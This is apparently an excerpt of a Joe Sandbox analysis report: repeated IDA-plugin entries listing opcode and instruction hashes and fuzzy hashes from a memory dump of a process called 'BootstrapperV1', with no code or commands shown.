                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2beb0d1a5483979159711de8e5a747b3806f6bb74a4c4a277dd305f150361133
                                              • Instruction ID: bc03c74556af3170ad8bd6aa5ef85559ac397778e9b725fdfe72719d5cce030a
                                              • Opcode Fuzzy Hash: 2beb0d1a5483979159711de8e5a747b3806f6bb74a4c4a277dd305f150361133
                                              • Instruction Fuzzy Hash: AE21E461A0EBC91FE756D7B814795B9BFF1DF56240B4801EED0C9DB2B3C90968028300
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a331024a6eae94722062685092fa6bf9eb1909bab3130eadb29ddd084f33ab92
                                              • Instruction ID: 3d2892d160197afbd0ac8f3ae279d26df0107fa0135405f143a5f0c9c0125919
                                              • Opcode Fuzzy Hash: a331024a6eae94722062685092fa6bf9eb1909bab3130eadb29ddd084f33ab92
                                              • Instruction Fuzzy Hash: BD21B021B18E0D0FEFA4EB6C8465BA833D1EF68340B4542BAD80DC72ABDD24EC458390
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f67d2ff82fbdb680036d20e7529d0b6c3cfb1c5086f6def8bf86afdc212124cb
                                              • Instruction ID: 9fd56a74894880767edcbe77edc8da510407bd6fe1182521761910ee62af55a9
                                              • Opcode Fuzzy Hash: f67d2ff82fbdb680036d20e7529d0b6c3cfb1c5086f6def8bf86afdc212124cb
                                              • Instruction Fuzzy Hash: DD21D431B0DE4D0FEAB4DAAC94A17B873D1EF58320B5512B6D40ECB2B6CD18ED418391
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 01f38aa80a3e447537d4eaba92f169b113662a4e8a87be68d40c0cd9eda0c0d9
                                              • Instruction ID: b5a12940550836dc4fefdb9c46d40e3dd44c4ca1c43719ac52046c4bc0a58452
                                              • Opcode Fuzzy Hash: 01f38aa80a3e447537d4eaba92f169b113662a4e8a87be68d40c0cd9eda0c0d9
                                              • Instruction Fuzzy Hash: D8210721B1DF4A0FD769E66C98A09E437A1FF9522074606B7D088CB1A6DD18A9068341
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5182406abad0f608a9d4a0081c7cc2c90cc0544857eccf850e15429796111276
                                              • Instruction ID: 840747ac7b58ba06341bb0d47214eff99f519b24949aaa3053b7393fde9f14fc
                                              • Opcode Fuzzy Hash: 5182406abad0f608a9d4a0081c7cc2c90cc0544857eccf850e15429796111276
                                              • Instruction Fuzzy Hash: 3211C4B2F0FB8D1FE7E548AA1CB526436C1EF9860170B12BBE44CC72B6ED15AE058355
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2ffc3b158fccfc61da6dce0b41c6bfacb0b318a406de80122129466f1caead12
                                              • Instruction ID: ce7b67442242fea4e3da1a3067c56efda72404e3941144fb5810dd7e49dbe741
                                              • Opcode Fuzzy Hash: 2ffc3b158fccfc61da6dce0b41c6bfacb0b318a406de80122129466f1caead12
                                              • Instruction Fuzzy Hash: 011148B3B0FE4D1FE6E448AE3CB527436C1EB9861170602BBE80CC32B6DC029D458355
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 89e5146180e4b534ca416880259edea852e1d324a431fd5e44528d2744819131
                                              • Instruction ID: e3dcfdd626654377728a12f76aac843e575904c5c0d057c37ca26fbfe97cccb5
                                              • Opcode Fuzzy Hash: 89e5146180e4b534ca416880259edea852e1d324a431fd5e44528d2744819131
                                              • Instruction Fuzzy Hash: 25110521B1EF8A0FE769D76C94B19E537A1FF9531074A06B7D088CB1F6DD18A9028341
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 80478747e4a34e3ce0ea9fab8752a3f125ca9f36c8ca2ad6402cdd9669d74d1d
                                              • Instruction ID: 1c2a9413263bc7ae5b51ef446336e182d98a895614a671298b43ea8578eac290
                                              • Opcode Fuzzy Hash: 80478747e4a34e3ce0ea9fab8752a3f125ca9f36c8ca2ad6402cdd9669d74d1d
                                              • Instruction Fuzzy Hash: CD11253170EA8C0FE7A4DA6C986DAB53BD4EF6A21130501FBD48CC71B7E916AC078350
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c7514f64fdc0876c1eb050c083f822e878335cec941c41b5a3adb8a0e831c329
                                              • Instruction ID: f26c99866fc8724ef737f7680f1447e5f932da494504badcee32dc6177d95252
                                              • Opcode Fuzzy Hash: c7514f64fdc0876c1eb050c083f822e878335cec941c41b5a3adb8a0e831c329
                                              • Instruction Fuzzy Hash: 26218060B19A498FDBA4EB2CC0A0FB673D1EF58300F4549B9D08AC76B6CD24F901C760
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e462a13bd952d0c4246d019f7604bdaca239990d775890b6c773bfd179d6cdbb
                                              • Instruction ID: f586f689d44e0ef9166d1e2edb94dc59c11bac09966eddc8b616976585b51bb8
                                              • Opcode Fuzzy Hash: e462a13bd952d0c4246d019f7604bdaca239990d775890b6c773bfd179d6cdbb
                                              • Instruction Fuzzy Hash: EE21F320A0E7C94FD76297748839A617FF1EF07210B0A85FBC489CB1B7D9186C0AC362
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8ebda47b249fc97a9a28da6c8ca348f1fc98a158393cccbbd1c0d76f555f5c63
                                              • Instruction ID: 8ff55fda628d16b8abbcafd042aaa8fd7937a35138c93b2efe90ff6b81dca3ae
                                              • Opcode Fuzzy Hash: 8ebda47b249fc97a9a28da6c8ca348f1fc98a158393cccbbd1c0d76f555f5c63
                                              • Instruction Fuzzy Hash: CB21A552A1F3DA0FD767A7B428755E47FA09F17220B4906FAC095CB0F3D91A2845C341
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6bd96475eff400a3b5275b0fb59027edc2f801ee9ead9c89f61db5a978ec78a1
                                              • Instruction ID: 418ca4ca1a7f8eb9b4d7f4155c41cb0cb7ef2181fc5ebc0af1ab916dca3fd677
                                              • Opcode Fuzzy Hash: 6bd96475eff400a3b5275b0fb59027edc2f801ee9ead9c89f61db5a978ec78a1
                                              • Instruction Fuzzy Hash: 4D110621B1EF8E0FD7A9D76894B19B477A1FF9531074A06B7D088CB1F6DD18A9018341
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5bc0b74d1c1caad1c18a68b25eeda7841859d00ac8b23a465541c47649cd1eea
                                              • Instruction ID: e5c78d9374c9a65b596429941392cbe76a724e0e4e299db9cebc6f9dc63a6b29
                                              • Opcode Fuzzy Hash: 5bc0b74d1c1caad1c18a68b25eeda7841859d00ac8b23a465541c47649cd1eea
                                              • Instruction Fuzzy Hash: 5411EE31B0DA1A4BDB78966CA4A46B632E1EB99320F11037FD05FC32F5ED25A941C380
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0560e6477c07a96e5c6fc84cb91c2020d7c3c4a7e260c854310aec3bfbcd747a
                                              • Instruction ID: 4545f497f86046b868ec44ddb84ee4f15f965c704d9a58ba75650668a1c3d17f
                                              • Opcode Fuzzy Hash: 0560e6477c07a96e5c6fc84cb91c2020d7c3c4a7e260c854310aec3bfbcd747a
                                              • Instruction Fuzzy Hash: FA21E73061DF8A8FC766DB2CC064E72BBE1EF6630070586EDD05AC72B2D925E941C710
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0f72f853c1c47746f19a2887c65d5fab7a73ecadddcd6149543d2a4853bf136d
                                              • Instruction ID: db91c5def24ed46ee46e79acf54f0b0c744c28958bf3023397eb200a7dadd28b
                                              • Opcode Fuzzy Hash: 0f72f853c1c47746f19a2887c65d5fab7a73ecadddcd6149543d2a4853bf136d
                                              • Instruction Fuzzy Hash: 37110052A0EECB0FD365967C58586647FC1DB9A13034903FBC4A9CB1F7DD08688683A2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8f8c3959a07f9e9a296336ba86fa004fa485ace3afb6fb8b31369bad5d57f92f
                                              • Instruction ID: 4256997092e01940294c10d28ad1542d750c50571d5d2e5bc4dbf73eddbbbbf8
                                              • Opcode Fuzzy Hash: 8f8c3959a07f9e9a296336ba86fa004fa485ace3afb6fb8b31369bad5d57f92f
                                              • Instruction Fuzzy Hash: 9B11AC31A1EB494FE7B19A7484A56B1B7E0AF00310F0645BBC4CE872B2DA38B985C750
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2e52e5488b48d35e2048ff90fbb1731c7ab2c4f2389ef92d664b14cd95184d81
                                              • Instruction ID: 704414a00b098a430ff50d1ca8a89eae73d8fb78189b4ccfc88139c6db41cbd3
                                              • Opcode Fuzzy Hash: 2e52e5488b48d35e2048ff90fbb1731c7ab2c4f2389ef92d664b14cd95184d81
                                              • Instruction Fuzzy Hash: 9E01A262B0EE4E4FEBACD94D646833527D1EBE82A1315477FD00DD32B4D8109D064390
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 84489dddb5a2ee6d50dd0c65d6cfbf7a8cf1f369788479d9509134e455622fad
                                              • Instruction ID: ddcbdb2c42a9716e7b23b8652e729534ceb31dcb529087bfe8acbb3f1c581ce2
                                              • Opcode Fuzzy Hash: 84489dddb5a2ee6d50dd0c65d6cfbf7a8cf1f369788479d9509134e455622fad
                                              • Instruction Fuzzy Hash: 9601AD31B0AA0D0FE6A4EAACA86466633D1EB98320F41037BF48CC72B6DD15A8014381
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 868e7ae982fa9fffbb5a27b4a0391a515fac5cc1f561bfa85f0371c72ef64ea1
                                              • Instruction ID: 4e141e50e0ef9412bd17ec4ff58a84a59c19f8c7bcf91e958f62a9b0419bd1bc
                                              • Opcode Fuzzy Hash: 868e7ae982fa9fffbb5a27b4a0391a515fac5cc1f561bfa85f0371c72ef64ea1
                                              • Instruction Fuzzy Hash: 8FF0A421B1FA4E0FEBA896AC68252A47BC0EF59310F4506BBE0CCCB1B6DD1D99424342
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e5fddc2d524eb8e5808bd71042008c41ba285d21dc08b673ee7449e3c75f2c8d
                                              • Instruction ID: 191bbbc2c7a9d3dd21abffae2229d09e15ebcff319e73dd7d492ddbc5709c495
                                              • Opcode Fuzzy Hash: e5fddc2d524eb8e5808bd71042008c41ba285d21dc08b673ee7449e3c75f2c8d
                                              • Instruction Fuzzy Hash: E1018B21B29E4F0BDBACEB5C94A4AB673D2FFD43007854A77D44DC72A9DD24E9418340
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 698b8265589d84e7fc6ed7d84b994f356171d99d089ece7a3b9a1ccd4aeeb3a7
                                              • Instruction ID: f1d381917345a280d2e7c7ccffa3c4035eb5217771b4aea144a1e1a884f491ce
                                              • Opcode Fuzzy Hash: 698b8265589d84e7fc6ed7d84b994f356171d99d089ece7a3b9a1ccd4aeeb3a7
                                              • Instruction Fuzzy Hash: C001D635B09A4C8FDF80FBAC94656EDBBE1EF99310B0403BBD45DC31A6D92464418781
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 64603d2f3182047def694b297d4e48964e10522ed70966eae7291ddd1e0f43fe
                                              • Instruction ID: 27ca1c0463cb4550fdb1ac094381b910f8f844f174a56bdc7760e5d0f609b9cb
                                              • Opcode Fuzzy Hash: 64603d2f3182047def694b297d4e48964e10522ed70966eae7291ddd1e0f43fe
                                              • Instruction Fuzzy Hash: 6C01A721B28E4E4BD7ECEB1C9460EB6B3E1FF94300785467AD009C3199DE25E8418780
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9ec7ecddc0a717cbeda37ca76a0aeef29b12f6de8e97513ccbc9eb6a1b04e602
                                              • Instruction ID: 3c73a1f8296fe009d58887ef4f24fe29bf33722db54b900a71f413ae748dc09e
                                              • Opcode Fuzzy Hash: 9ec7ecddc0a717cbeda37ca76a0aeef29b12f6de8e97513ccbc9eb6a1b04e602
                                              • Instruction Fuzzy Hash: 08F0243271EE0D0FABACE19D602863263C6DBE8266716023FD84DC32B0DC14DC034350
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c77aefd38172679a27e96616c87001a02266711ada9c3cef4cbb18d4a0944f12
                                              • Instruction ID: 3c0b264ecae5c5e2414e70283fc091954335012f8a6f4db25ac4600c85d6b265
                                              • Opcode Fuzzy Hash: c77aefd38172679a27e96616c87001a02266711ada9c3cef4cbb18d4a0944f12
                                              • Instruction Fuzzy Hash: E1E02B21F0FE4E07DE9CA8765C7662031D1FFE9204BDA00A9C45CC61A2FD8AD9928301
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a6e9609f414b2c6dee6a9b60682e59ddfd1caf386be40e54ae2b86e41f9fbf4b
                                              • Instruction ID: f4af435d66d134de57f89709cbcb8d18712cdb03b26609f2005bc9575a7744be
                                              • Opcode Fuzzy Hash: a6e9609f414b2c6dee6a9b60682e59ddfd1caf386be40e54ae2b86e41f9fbf4b
                                              • Instruction Fuzzy Hash: 62E0C220A19B4A07E714FA724C4527A71D2BB88205FC64B76D88CC10B0FA2CC3C84262
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 258aebc614e8d45470a5f80dc5a80f5e356d23fff13c83d26b88d9e2362c91ea
                                              • Instruction ID: d39a30428f15f889af1d5dbabeb502c25283c21c750c62a016b308e8da841aa2
                                              • Opcode Fuzzy Hash: 258aebc614e8d45470a5f80dc5a80f5e356d23fff13c83d26b88d9e2362c91ea
                                              • Instruction Fuzzy Hash: 9ED0A711B1DE1D0FA2D4AA9C74D05F9A281E7981203801737C00AC229ECC5859464340
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0c8648218ce9efc928c5b46172d12a4b80372b845893b39bd118ba0729803c41
                                              • Instruction ID: f66fad9f73c4f483718c07f405aa64164f93b409b756b7857c48c82ee58ecdc2
                                              • Opcode Fuzzy Hash: 0c8648218ce9efc928c5b46172d12a4b80372b845893b39bd118ba0729803c41
                                              • Instruction Fuzzy Hash: DED02E30B2DA1C0AEBB0BAA850297F933D0CB44354F050B37EC0CF62B0ED489B8142D1
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 75261d37e021c448ce7a6cdf38988fe9b764c51e423080561eedaeb09bca561a
                                              • Instruction ID: 1ac08401c76368936e7270f6f013625f7c315e691a2313460068f6481d0aeefc
                                              • Opcode Fuzzy Hash: 75261d37e021c448ce7a6cdf38988fe9b764c51e423080561eedaeb09bca561a
                                              • Instruction Fuzzy Hash: 64D05B31A0A95C0FDAB4DB6D94645647BD0FF18A0070611DBD89CC72B1D945ADC14341
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5d130c6a8537bb9ee423bfbad53f6c3c1cb2cb22aa1356eafb1d0909762d4c67
                                              • Instruction ID: 263dfd64b5bae84d7c51c1abc27344c3116dd147b7dc37d8852966696a0b8439
                                              • Opcode Fuzzy Hash: 5d130c6a8537bb9ee423bfbad53f6c3c1cb2cb22aa1356eafb1d0909762d4c67
                                              • Instruction Fuzzy Hash: E6D0A710F1992D09FB7861EC24A13F82081CF48224F820176D41DD22DEDC9E1D9102C2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b703367d5406b91986decb0241b28c48e8cd24c2868f5813d200dfa1af5c79ab
                                              • Instruction ID: 034358d4aed7ff605516a4d1b26d3b471cae387cc50a78b4c0a10e5ca706128b
                                              • Opcode Fuzzy Hash: b703367d5406b91986decb0241b28c48e8cd24c2868f5813d200dfa1af5c79ab
                                              • Instruction Fuzzy Hash: E5E08C4090F7C91FDF02BBBC446A19A3FB04F0B24070844E9C0899F0F3E008040EC302
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5d41566ec289db0c9c0e1236429250594f18be49c0d52a3a30b65739f4429f1c
                                              • Instruction ID: 672da73e87b27132aa2b16aca2c24c289181e8a358292a2dd5cd14ba4d7b367b
                                              • Opcode Fuzzy Hash: 5d41566ec289db0c9c0e1236429250594f18be49c0d52a3a30b65739f4429f1c
                                              • Instruction Fuzzy Hash: 49E08C74F1EB1E4AE1706EA440203B97192BF44700F118A39C0AEC26F2CD7DB28157A0
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c16e60116f58d505552d5c9f33d1b2f5bd7e082df6155ba609df794bcf060edd
                                              • Instruction ID: acb8dfaac0716d6a70639ce60d7eb1f489f8a5135947ed5ccb0f51e338809a17
                                              • Opcode Fuzzy Hash: c16e60116f58d505552d5c9f33d1b2f5bd7e082df6155ba609df794bcf060edd
                                              • Instruction Fuzzy Hash: CFD05E306092444FCB58AE2CA090C80B790EF1220835509ECE0144B2E7C56AEC82CB01
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1c897b40555b45c982157d78aafd6584ba5ee0cae40db3e61f4b143c88450d99
                                              • Instruction ID: 2d65ee6a978b06ed4f5bee8f388f65b8c0a7d5e7d1cda10e2a93df7edf649e90
                                              • Opcode Fuzzy Hash: 1c897b40555b45c982157d78aafd6584ba5ee0cae40db3e61f4b143c88450d99
                                              • Instruction Fuzzy Hash: AAB09B62E05B4D0BD391C95C149421116D3D7D8141B05831B5499C2275DD1554419350
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 47841986c33c53000ff8a8d03fe4466156ca88ac963f95bb0cd9e95b307c0719
                                              • Instruction ID: 7fc03c094b4339023d32814aee64121fe057080109c9a5a8287088065b6dc018
                                              • Opcode Fuzzy Hash: 47841986c33c53000ff8a8d03fe4466156ca88ac963f95bb0cd9e95b307c0719
                                              • Instruction Fuzzy Hash: 0AA1393770D7694ED315B76DB8A54E9BB60EFC133A70503BBC2C98E0A3DA186246C6D1